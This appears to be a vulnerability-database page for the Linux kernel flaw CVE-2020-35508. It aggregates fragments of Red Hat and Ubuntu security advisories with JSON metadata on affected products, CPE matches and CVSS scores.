iQIVAwUBYKPwgNzjgjWX9erEAQiOVg//YfXIKUxc84y2aRexvrPHeTQvYkFMktq7 NEhNhHqEZbDUabM5+eKb5hoyG44PmXvQuK1njYjEbpTjQss92U8fekGJZAR9Zbsl WEfVcu/ix/UJOzQj/lp+dKhirBSE/33xgBmSsQI6JQc+xn1AoZC8bOeSqyr7J6Y7 t6I552Llhun9DDUGS8KYAM8PkrK3RGQybAS3S4atTdYd0qk42ZPF7/XqrbI7G4iq 0Oe+ZePj6lN1O7pHV0WYUD2yzLTCZZopmz5847BLBEbGLqPyxlShZ+MFGsWxCOHk tW8lw/nqVt/MNlOXI1tD6P6iFZ6JQYrRU5mGFlvsl3t9NQW60MxmcUNPgtVknXW5 BssBM/r6uLi0yFTTnDRZnv2MCs7fIzzqKXOHozrCvItswG6S8Qs72MaW2EQHAEen m7/fMKWTjt9CQudNCm/FwHLb8O9cYnOZwRiAINomo2B/Fi1b7WlquETSmjgQaQNr RxqtgiNQ98q92gnFgC8pCzxmiKRmHLFJEuxXYVq0O8Ch5i/eC8ExoO7Hqe6kYnJe ZaST6fAtb2bMDcPdborfSIUmuDcYdKFtcEfCuuFZIbBxnL2aJDMw0zen/rmDNQyV lwwXoKanoP5EjKKFMc/zkeHlOInMzeHa/0DIlA9h3kpro5eGN0uOPZvsrlryjC+J iJzkORGWplM\xfb/D -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . 8) - aarch64, noarch, ppc64le, s390x, x86_64

  1. Bugs fixed (https://bugzilla.redhat.com/):

1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation

  1. JIRA issues fixed (https://issues.jboss.org/):

LOG-1328 - Port fix to 5.0.z for BZ-1945168

Bug Fix(es):

  • kernel-rt: update RT source tree to the latest RHEL-8.2.z10 Batch source tree (BZ#1968022)

  • Bugs fixed (https://bugzilla.redhat.com/):

1886285 - CVE-2020-26541 kernel: security bypass in certs/blacklist.c and certs/system_keyring.c 1895961 - CVE-2020-25704 kernel: perf_event_parse_addr_filter memory 1902724 - CVE-2020-35508 kernel: fork: fix copy_process(CLONE_PARENT) race with the exiting ->real_parent 1961305 - CVE-2021-33034 kernel: use-after-free in net/bluetooth/hci_event.c when destroying an hci_chan 1968022 - kernel-rt: update RT source tree to the latest RHEL-8.2.z10 Batch source tree 1970273 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer

  1. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.7.13. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2021:2122

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html

This update fixes the following bug among others:

  • Previously, resources for the ClusterOperator were being created early in the update process, which led to update failures when the ClusterOperator had no status condition while Operators were updating. This bug fix changes the timing of when these resources are created. As a result, updates can take place without errors. (BZ#1959238)

Security Fix(es):

  • gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)

You may download the oc tool and use it to inspect release image metadata as follows:

(For x86_64 architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.13-x86_64

The image digest is sha256:783a2c963f35ccab38e82e6a8c7fa954c3a4551e07d2f43c06098828dd986ed4

(For s390x architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.13-s390x

The image digest is sha256:4cf44e68413acad063203e1ee8982fd01d8b9c1f8643a5b31cd7ff341b3199cd

(For ppc64le architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.13-ppc64le

The image digest is sha256:d47ce972f87f14f1f3c5d50428d2255d1256dae3f45c938ace88547478643e36

All OpenShift Container Platform 4.7 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -between-minor.html#understanding-upgrade-channels_updating-cluster-between - -minor

  1. Solution:

For OpenShift Container Platform 4.7 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html

Details on how to access this content are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -cli.html

  1. Bugs fixed (https://bugzilla.redhat.com/):

1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 1923268 - [Assisted-4.7] [Staging] Using two both spelling "canceled" "cancelled" 1947216 - [AWS] Missing iam:ListAttachedRolePolicies permission in permissions.go 1953963 - Enable/Disable host operations returns cluster resource with incomplete hosts list 1957749 - ovn-kubernetes pod should have CPU and memory requests set but not limits 1959238 - CVO creating cloud-controller-manager too early causing upgrade failures 1960103 - SR-IOV obliviously reboot the node 1961941 - Local Storage Operator using LocalVolume CR fails to create PV's when backend storage failure is simulated 1962302 - packageserver clusteroperator does not set reason or message for Available condition 1962312 - Deployment considered unhealthy despite being available and at latest generation 1962435 - Public DNS records were not deleted when destroying a cluster which is using byo private hosted zone 1963115 - Test verify /run filesystem contents failing

  1. ========================================================================== Ubuntu Security Notice USN-4752-1 February 25, 2021

linux-oem-5.6 vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description: - linux-oem-5.6: Linux kernel for OEM systems

Details:

Daniele Antonioli, Nils Ole Tippenhauer, and Kasper Rasmussen discovered that legacy pairing and secure-connections pairing authentication in the Bluetooth protocol could allow an unauthenticated user to complete authentication without pairing credentials via adjacent access. A physically proximate attacker could use this to impersonate a previously paired Bluetooth device. (CVE-2020-10135)

Jay Shin discovered that the ext4 file system implementation in the Linux kernel did not properly handle directory access with broken indexing, leading to an out-of-bounds read vulnerability. A local attacker could use this to cause a denial of service (system crash). (CVE-2020-14314)

It was discovered that the block layer implementation in the Linux kernel did not properly perform reference counting in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash). (CVE-2020-15436)

It was discovered that the serial port driver in the Linux kernel did not properly initialize a pointer in some situations. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2020-15437)

Andy Nguyen discovered that the Bluetooth HCI event packet parser in the Linux kernel did not properly handle event advertisements of certain sizes, leading to a heap-based buffer overflow. A physically proximate remote attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-24490)

It was discovered that the NFS client implementation in the Linux kernel did not properly perform bounds checking before copying security labels in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-25212)

It was discovered that the Rados block device (rbd) driver in the Linux kernel did not properly perform privilege checks for access to rbd devices in some situations. A local attacker could use this to map or unmap rbd block devices. (CVE-2020-25284)

It was discovered that the block layer subsystem in the Linux kernel did not properly handle zero-length requests. A local attacker could use this to cause a denial of service. (CVE-2020-25641)

It was discovered that the HDLC PPP implementation in the Linux kernel did not properly validate input in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-25643)

Kiyin (尹亮) discovered that the perf subsystem in the Linux kernel did not properly deallocate memory in some situations. A privileged attacker could use this to cause a denial of service (kernel memory exhaustion). (CVE-2020-25704)

It was discovered that the KVM hypervisor in the Linux kernel did not properly handle interrupts in certain situations. A local attacker in a guest VM could possibly use this to cause a denial of service (host system crash). (CVE-2020-27152)

It was discovered that the jfs file system implementation in the Linux kernel contained an out-of-bounds read vulnerability. A local attacker could use this to possibly cause a denial of service (system crash). (CVE-2020-27815)

It was discovered that an information leak existed in the syscall implementation in the Linux kernel on 32 bit systems. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2020-28588)

It was discovered that the framebuffer implementation in the Linux kernel did not properly perform range checks in certain situations. A local attacker could use this to expose sensitive information (kernel memory). A local attacker could use this to gain unintended write access to read-only memory pages. A local attacker could use this to cause a denial of service (system crash) or possibly expose sensitive information. (CVE-2020-29369)

Jann Horn discovered that the romfs file system in the Linux kernel did not properly validate file system meta-data, leading to an out-of-bounds read. An attacker could use this to construct a malicious romfs image that, when mounted, exposed sensitive information (kernel memory). (CVE-2020-29371)

Jann Horn discovered that the tty subsystem of the Linux kernel did not use consistent locking in some situations, leading to a read-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly expose sensitive information (kernel memory). (CVE-2020-29660)

Jann Horn discovered a race condition in the tty subsystem of the Linux kernel in the locking for the TIOCSPGRP ioctl(), leading to a use-after- free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2020-35508)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 20.04 LTS: linux-image-5.6.0-1048-oem 5.6.0-1048.52 linux-image-oem-20.04 5.6.0.1048.44

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://usn.ubuntu.com/4752-1 CVE-2020-10135, CVE-2020-14314, CVE-2020-15436, CVE-2020-15437, CVE-2020-24490, CVE-2020-25212, CVE-2020-25284, CVE-2020-25641, CVE-2020-25643, CVE-2020-25704, CVE-2020-27152, CVE-2020-27815, CVE-2020-28588, CVE-2020-28915, CVE-2020-29368, CVE-2020-29369, CVE-2020-29371, CVE-2020-29660, CVE-2020-29661, CVE-2020-35508

Package Information: https://launchpad.net/ubuntu/+source/linux-oem-5.6/5.6.0-1048.52

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202103-0287",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h700e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h500e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.12"
      },
      {
        "model": "h300e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h615c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "model": "fas8700",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h610c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "brocade fabric operating system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.12"
      },
      {
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "a700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fas8300",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h610s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "aff a400",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h410c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "red hat enterprise linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-016425"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-35508"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:5.12:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:5.12:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:5.12:rc3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:5.12:rc4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:5.12:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.12",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:a700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:a700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:netapp:brocade_fabric_operating_system_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:fas8300_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:fas8300:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:fas8700_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:fas8700:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:aff_a400_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:aff_a400:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h610c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h610c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h610s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h610s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h615c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h615c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-35508"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162654"
      },
      {
        "db": "PACKETSTORM",
        "id": "162626"
      },
      {
        "db": "PACKETSTORM",
        "id": "162837"
      },
      {
        "db": "PACKETSTORM",
        "id": "163584"
      },
      {
        "db": "PACKETSTORM",
        "id": "162877"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-1668"
      }
    ],
    "trust": 1.1
  },
  "cve": "CVE-2020-35508",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.4,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.4,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 4.4,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2020-35508",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.4,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.4,
            "id": "VHN-377704",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:M/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "LOW",
            "baseScore": 4.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 1.0,
            "impactScore": 3.4,
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "Low",
            "baseScore": 4.5,
            "baseSeverity": "Medium",
            "confidentialityImpact": "Low",
            "exploitabilityScore": null,
            "id": "CVE-2020-35508",
            "impactScore": null,
            "integrityImpact": "Low",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-35508",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202102-1668",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-377704",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2020-35508",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-377704"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-35508"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-016425"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-1668"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-35508"
      }
    ]
  },
  "description": {
    "@context": {
